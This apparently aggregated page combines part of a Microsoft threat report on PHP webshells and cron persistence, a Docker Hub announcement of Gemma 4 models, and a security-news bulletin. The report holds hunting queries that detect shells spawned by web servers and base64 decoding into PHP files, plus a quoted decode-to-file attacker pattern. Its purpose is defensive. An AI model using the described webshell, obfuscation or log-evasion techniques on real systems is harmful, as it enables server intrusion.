Initial Access, Execution, Defense Evasion
An obfuscated or encoded script is executed by the cron service, indicating suspicious scheduled execution activity potentially used to bypass direct user interaction and evade detection.
Microsoft Defender for Endpoint Suspicious script launched, Suspicious shell command execution Suspicious file and directory permission modification
Execution Persistence
A new cron job is created by a hosting control panel process (such as cPanel), to establish persistence by scheduling recurring execution of attacker-controlled commands or scripts without further user interaction.
Microsoft Defender for Endpoint Suspicious cron job Suspicious execution of elevated process
Persistence
A PHP file (for example, index.php) is dropped or modified in a web-accessible directory, suggesting the deployment of a server-side script that may be used to execute arbitrary commands or maintain long-term access to the web server
Microsoft Defender for Endpoint Possible Web Server compromise activity
Persistence
A PHP webshell file (such as index.php) is written to disk and identified as active malware, indicating confirmation of server-side backdoor deployment intended for remote command execution via HTTP requests.
Microsoft Defender Antivirus An active ‘Webshell’ malware was blocked ‘WebShell’ malware was prevented An active ‘Obfuse’ malware was blocked
Microsoft Security Copilot prompts
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Microsoft Defender XDR threat analytics
Advanced Hunting queries
Web Server Spawning Shell
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("php-fpm", "httpd", "apache2", "nginx")
| where FileName in~ ("bash", "sh", "dash")
| project Timestamp, DeviceName, AccountName,
InitiatingProcessFileName, InitiatingProcessCommandLine,
FileName, ProcessCommandLine, FolderPath
| order by Timestamp desc
Base64 Decode Writing PHP File
DeviceProcessEvents
| where FileName in~ ("bash", "sh", "dash", "jailshell")
| where ProcessCommandLine has "base64"
| where ProcessCommandLine has ".php"
| project Timestamp, DeviceName, AccountName,
ProcessCommandLine,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by Timestamp desc
tee Writing PHP Files
DeviceProcessEvents
| where ProcessCommandLine has "tee"
| where ProcessCommandLine has ".php"
| project Timestamp, DeviceName, AccountName,
InitiatingProcessFileName,
ProcessCommandLine
| order by Timestamp desc
cPanel / jailshell Abuse
DeviceProcessEvents
| where FileName in~ ("jailshell", "cpanel")
| project Timestamp, DeviceName, AccountName,
FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
High-Risk Combined Pattern
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("php-fpm", "httpd", "apache2", "nginx", "cron", "crond")
| where ProcessCommandLine has "base64"
| where ProcessCommandLine has_any (".php", "public_html", "vendor")
| project Timestamp, DeviceName, AccountName,
InitiatingProcessFileName,
ProcessCommandLine
| order by Timestamp desc
Unexpected Shell from Backend Workers
DeviceProcessEvents
| where InitiatingProcessCommandLine has_any ("artisan", "queue:work", "fwconsole")
| where FileName in~ ("bash", "sh", "dash")
| project Timestamp, DeviceName,
InitiatingProcessCommandLine,
ProcessCommandLine
| order by Timestamp desc
Repeated Execution Pattern (1-Minute Cron)
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("cron", "crond")
| summarize count() by DeviceName, ProcessCommandLine, bin(Timestamp, 1m)
| where count_ > 10
| order by count_ desc
MITRE ATT&CK™ Techniques observed
This campaign exhibited the following MITRE ATT&CK™ techniques across multiple tactics. For detailed detection and prevention capabilities, see the Microsoft Defender XDR Detections section below.
Tactic
Technique ID
Technique Name
How it Presents in This Campaign
Initial Access
T1190
Exploit Public-Facing Application
Attackers gain access through exposed web applications or hosting environments and use that access to introduce server-side tooling that blends into the web stack.
Persistence
T1505.003
Server Software Component: Web Shell
A PHP webshell is placed in a web-accessible location and designed to remain dormant during normal traffic, enabling long-term access through web requests.
Defense Evasion
T1027
Obfuscated/Encrypted File or Information
Payloads and scripts are obfuscated or encoded (for example, high-entropy strings and base64-encoded blobs) to reduce inspection and evade simple content-based detections.
Defense Evasion
T1140
Deobfuscate/Decode Files or Information
Attackers decode inline payloads at runtime, such as echo <blob> | base64 -d > <file> to reconstruct PHP content on disk with minimal interactive footprint.
Command and Control
T1105
Ingress Tool Transfer
Additional files or second-stage scripts are retrieved using file ingress utilities such as curl or wget, often writing directly into web directories or application paths.
Execution
T1059.004
Command and Scripting Interpreter: Unix Shell
Web-facing workloads (for example, php-fpm, apache2, nginx) spawn shell interpreters (sh, bash, dash) to execute attacker-provided commands from webshell logic or injected requests.
Persistence
T1053.003
Scheduled Task/Job: Cron
Persistence is established via cron, including jobs created by hosting tooling (for example, cPanel) and recurring execution patterns (including short intervals such as one-minute loops).
Defense Evasion
T1222.002
File and Directory Permissions Modification
File or directory permissions are modified to enable write/execute access in web paths or to ensure persistence artifacts remain accessible to the compromised runtime context.
This research is provided by Microsoft Defender Security Research with contributions from Yashashree Gund and other members of Microsoft Threat Intelligence.
Learn more
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
Docker Hub is quickly becoming the home for AI models, serving millions of developers and bringing together a curated lineup that spans lightweight edge models to high-performance LLMs, all packaged as OCI artifacts.
Today, we’re excited to welcome Gemma 4, the latest generation of lightweight, state-of-the-art open models. Built on the same technology behind Gemini, Gemma 4 introduces three architectures that scale from low-power efficiency to high-end server performance.
By packaging models as OCI artifacts, models behave just like containers. They become versioned, shareable, and instantly deployable, with no custom toolchains required. You can pull ready-to-run models from Docker Hub, push your own, integrate with any OCI registry, and plug everything directly into your existing CI/CD pipelines using familiar tooling for security, access control, and automation.
And this is just the start. Over the next few weeks, Gemma 4 support is coming to Docker Model Runner, so you will not just discover models on Hub, you will be able to run, manage, and deploy them directly from Docker Desktop with the same simplicity you expect from Docker.
Docker Hub’s growing GenAI catalog already includes popular models like IBM Granite, Llama, Mistral, Phi, and SolarLLM, alongside apps like JupyterHub and H2O.ai, plus essential tools for inference, optimization, and orchestration.
What Docker Brings to Gemma 4
Gemma 4 expands what efficient, high-performance models can do. Docker makes them simple to run, share, and scale anywhere.
Run efficiently at the edge: Smaller Gemma 4 variants are optimized for on-device performance. Docker enables consistent deployment across laptops, edge devices, and local environments.
Scale performance with ease: From sparse to dense architectures, you can run any model like a container, making it easy to scale across cloud or on-prem infrastructure.
One command to get started: Gemma 4 is just one command away:
docker model pull gemma4
No proprietary download tools. No custom authentication flows. Just the same pull, tag, push, and deploy workflow you already use.
By bringing Gemma 4 to Docker Hub, you get powerful models with a familiar, production-ready workflow.
What’s New in Gemma 4?
Gemma 4 redefines what “small” models can do, with architectures optimized across multiple sizes and use cases:
Small & Efficient (E2B, E4B): Built for on-device performance with high throughput and low memory use.
Flagship Dense (31B): High-performance model with a 256K context window for long-context reasoning.
Key capabilities include multimodal support (text, image, audio), advanced reasoning with “thinking” tokens, and strong coding plus function-calling abilities.
Technical Specifications
Model Name
Type
Total Params
Input Modalities
Context Window
Gemma 4 E2B
Dense (Small)
5.1B
Text, Vision, Audio
128K
Gemma 4 E4B
Dense (Small)
8.0B
Text, Vision, Audio
128K
Gemma 4 26B A4B
MoE
26.8B (3.8B active)
Text, Vision
256K – 512K
Gemma 4 31B
Dense
31.3B
Text, Vision
256K – 512K
Build the Future of AI with Docker Hub
The arrival of Gemma 4 on Docker Hub reinforces our commitment to making Docker Hub the best place to discover, share, and run AI models. Whether you are building a voice-activated mobile assistant or a large-scale document retrieval system, Docker Hub makes it simple to find the right model, pull it instantly, and run it anywhere.
The latest ThreatsDay Bulletin is basically a cheat sheet for everything breaking on the internet right now. No corporate fluff or boring lectures here, just a quick and honest look at the messy reality of keeping systems safe this week.
Things are moving fast. The list includes researchers chaining small bugs together to create massive backdoors, old software flaws coming back to haunt us, and some very clever new tricks that let attackers bypass security logs entirely without leaving a trace. We are also seeing sketchier traffic on the underground and the usual supply chain mess, where one bad piece of code threatens thousands of apps.
It is definitely worth a quick scan before you log off for the day, if only to make sure none of this is sitting in your own network. Let's get into it.
watchTower Labs has disclosed two security flaws in Progress ShareFile (CVE-2026-2699 and CVE-2026-2701) that could be chained to achieve pre-authenticated remote code execution. While CVE-2026-2699 is an authentication bypass via the "/ConfigService/Admin.aspx" endpoint, CVE-2026-2701 refers to a case of post-authenticated remote code execution. An attacker could combine the two vulnerabilities to sidestep authentication and upload web shells. Progress released fixes for the vulnerabilities with Storage Zone Controller 5.12.4 released on March 10, 2026. There are about 30,000 internet-facing instances, making patching against the flaws crucial.
A new Android malware named NoVoice has been distributed via more than 50 apps that were downloaded at least 2.3 million times. While apps masqueraded as utilities, image galleries, and games, and offered the advertised functionality, the malware attempted to obtain root access on the device by exploiting 22 Android vulnerabilities that received patches between 2016 and 2021. "If the exploits succeed, the malware gains full control of the device," McAfee Labs said. "From that moment onward, every app that the user opens is injected with attacker-controlled code. This allows the operators to access any app data and exfiltrate it to their servers." The malware avoids infecting devices in certain regions, like Beijing and Shenzhen in China, and implements more than a dozen checks for emulators, debuggers, and VPNs. It then contacts a remote server to send device information and fetch appropriate exploits to gain root access and disable SELinux. Upon gaining elevated access, the rootkit modifies system libraries to facilitate the execution of malicious code when specific apps are opened, install arbitrary apps, and enable persistence. NoVoice has been found to share some level of overlap with Triada. One of the targeted apps is WhatsApp, which enabled the malware to harvest data from the app as soon as it was launched. Google has since removed the apps. The highest concentration of infections has been reported in Nigeria, Ethiopia, Algeria, India, and Kenya.
The U.S. Federal Bureau of Investigation (FBI) is warning of the data security risks associated with foreign-developed mobile applications. "As of early 2026, many of the most downloaded and top-grossing apps in the United States are developed and maintained by foreign companies, particularly those based in China," the FBI said. "The apps that maintain digital infrastructure in China are subject to China's extensive national security laws, enabling the Chinese government to potentially access mobile app users' data." The bureau also warned that these apps may harvest contact information under the pretext of inviting friends to use them, store personal data in Chinese servers, or contain malware that could collect data beyond what is authorized by the user. "This could include malicious code and hard-to-remove malware designed to exploit known vulnerabilities in various operating systems and insert a backdoor for escalated privileges, such as enabling the download and execution of additional malicious packages designed to provide unauthorized access to users' data," it added. The FBI did not name the apps, but TikTok, Shein, Temu, and DeepSeek fit the profile.
The U.S. State Department has officially launched the Bureau of Emerging Threats, a new unit tasked with protecting U.S. national security against cyber attacks against critical infrastructure, threats in the space domain, and misuse of artificial intelligence (AI) and other advanced technology risks from Iran, China, Russia, and North Korea.
Li Xiong, the former chairman of a Cambodian financial conglomerate, HuiOne, has been extradited to China. He has been accused of operating gambling dens, fraud, unlawful business operations, and money laundering. According to Xinhua, Li is said to be a key member of the transnational cybercrime syndicate masterminded by Chen Zhi, the chairman of Prince Group, who was extradited to China in January 2026 and has been indicted by the U.S. for operating large-scale, forced-labor "pig butchering" scam compounds in Southeast Asia. In May 2025, the U.S. Treasury's Financial Crimes Enforcement Network labeled Huione Group "a financial institution of primary money laundering concern."
Google said it's rolling out the ability to change a username to Google Account users in the U.S. "Your previous Google Account email ending in gmail.com will become an alternate email address," Google said in a support document. "You'll receive emails to both your old and new addresses. The data saved in your account won’t be affected. This includes things like photos, messages, and emails sent to your previous email address." While users can change back to their previous email address at any time, it's not possible to create a new Google Account email ending in gmail.com for the next 12 months. The new email address cannot be deleted either.
A U.S. federal judge has temporarily blocked the Trump administration's designation of Anthropic as a supply chain risk. The AI company had argued that the designation was causing immediate and irreparable harm. "Nothing in the governing statute supports the Orwellian notion that an American company may be branded a potential adversary and saboteur of the U.S. for expressing disagreement with the government," District Judge Rita Lin wrote in the ruling.
Cybercriminals have set their sights on Android users through a new phishing scheme that disguises malicious applications as beta-testing opportunities for ChatGPT and Meta advertising tools. In these attacks, what appears to be an invitation to advertising apps turns out to be a carefully planned attempt to steal Facebook credentials and hijack control of user accounts. "These messages push malicious apps delivered through 'firebase-noreply@google.com' via Firebase App Distribution, a legitimate Google service for distributing pre-release apps to testers," LevelBlue said. "Once installed, these apps request Facebook credentials, leading to phishing and account takeover." A similar campaign has leveraged phishing emails impersonating ChatGPT and Gemini to push users into downloading malicious iOS apps from the Apple App Store. "Disguised as business or ad management tools, these apps prompt for Facebook credentials, leading to credential harvesting," the company added.
Google has made ransomware detection and file restoration in Drive generally available after launching the feature in beta in September 2025 to help organizations minimize the impact of malware attacks on personal computers. Ransomware detection pauses file syncing, and file restoration allows users to bulk restore their files to a previous version in Drive. "Compared to when the feature was in beta, we are now able to detect even more types of ransomware encryption and are able to do it faster," Google said. "Our latest AI model is detecting 14x more infections, leading to even more comprehensive protection."
Cybersecurity company Darktrace said it has observed a steady increase in GhostSocks activity across its customer base since late 2025. "In one notable case from December 2025, Darktrace detected GhostSocks operating alongside Lumma Stealer, reinforcing that the partnership between Lumma and GhostSocks remains active despite recent attempts to disrupt Lumma's infrastructure," it said. Originally marketed on the Russian underground forum xss[.]is as a malware-as-a-service (MaaS), GhostSocks enables threat actors to turn compromised devices into residential proxies, leveraging the victim's internet bandwidth to route malicious traffic through it. It utilizes the SOCKS5 proxy protocol, creating a SOCKS5 connection on infected devices. It began to be widely adopted following its partnership with Lumma Stealer in 2024.
The number of malware advisories across open-source ecosystems has increased 13.6x since January 2024, as threat actors take control of trusted packages to poison the software supply chain. "Of the 1,011 npm ATO [Account takeover] advisories recorded in the OSV database over all time, 930 were filed in 2025, a roughly 12x year-over-year increase representing 92% of all ATOs reported on npm," Endor Labs said. Among the 2025 npm ATO cases, 38.4% of affected packages had more than 1,000 monthly downloads, 18.5% exceeded 10,000, and 11.1% had more than 100,000. Attackers are deliberately targeting packages that are deeply embedded in production systems and automated CI/CD pipelines, maximizing the blast radius of each compromise."
An updated version of the XLoader information-stealing malware (version 8.7) has been found to incorporate several changes to the code obfuscation to make automation and analysis more difficult. These include the use of encrypted strings that are decrypted at runtime, encrypted code blocks consisting of functions that are decrypted at runtime, and improved methods to conceal hard-coded values and specific functions, per Zscaler. XLoader also uses a combination of multiple encryption layers with different keys for encrypting network traffic. "XLoader continues to be a highly active information stealer that constantly receives updates," the company said. "As a result of the malware's multiple encryption layers, decoy C2 servers, and robust code obfuscation, XLoader has been able to remain largely under the radar."
Cybersecurity researchers have found multiple zero-day vulnerabilities in ImageMagick that could be chained to achieve remote code execution through a single image or PDF upload. According to Pwn.ai, the attack works on the default configuration and the most restrictive "secure" configuration. The issue affects every major Linux distribution, as well as WordPress installations that process image uploads. It remains unpatched as of writing. In the interim, it's advised to process PDFs in an isolated sandbox with no network access, disable XML-RPC in WordPress, and block GhostScript.
Adversaries are bypassing traditional CloudTrail detections, like StopLogging or DeleteTrail, and instead using lesser-known AWS APIs to blind logging systems. This includes creating "invisible activity zones” using PutEventSelectors, using StopEventDataStoreIngestion and DeleteEventDataStore to halt or destroy long-term forensic visibility, disabling anomaly detection via PutInsightSelectors, neutralizing cross-account protections through DeleteResourcePolicy and DeregisterOrganizationDelegatedAdmin. "The real risk is in the sequence: individually, these API calls look like routine maintenance—but chained together, they allow attackers to erase evidence and evade detection entirely," Abstract Security said.
The threat actor known as LofyGang resurfaced with a fake npm package ("undicy-http") that delivers a dual-payload attack: a Node.js-based Remote Access Trojan (RAT) with live screen streaming, and a native Windows PE binary that uses direct syscalls to inject into browser processes and steal credentials, cookies, credit cards, IBANs, and session tokens from more than 50 web browsers and 90 cryptocurrency wallet extensions. The session hijacking module targets Roblox, Instagram, Spotify, TikTok, Steam, Telegram, and Discord. "The Node.js layer independently operates as a full RAT with remote shell, screen capture, webcam/microphone streaming, file upload, and persistence capabilities, all controlled through a WebSocket C2 panel," JFrog said. The Node.js layer also downloads a native PE binary to facilitate data exfiltration via a Discord webhook and a Telegram bot.
Nothing here looks huge on its own. That’s the point. Small changes, repeated enough times, start to matter. Things that used to be hard are getting easier. Things that were noisy are getting quiet. You stop seeing the obvious signs and start missing the subtle ones.
Read it like a pattern, not a list. Same ideas showing up in slightly different forms. Systems doing what they’re designed to do—just used differently. That gap is where most problems live now. That’s the recap.
from The Hacker News https://ift.tt/IgpZ458
via IFTTT
![[Video] The TTP Ep 21: When Attackers Become Trusted Users](https://blog.talosintelligence.com/content/images/2026/04/2025YiR-report_cover.jpg)
![[Video] The TTP Ep 21: When Attackers Become Trusted Users](https://blog.talosintelligence.com/content/images/2026/03/YiR2025_background-2.jpg)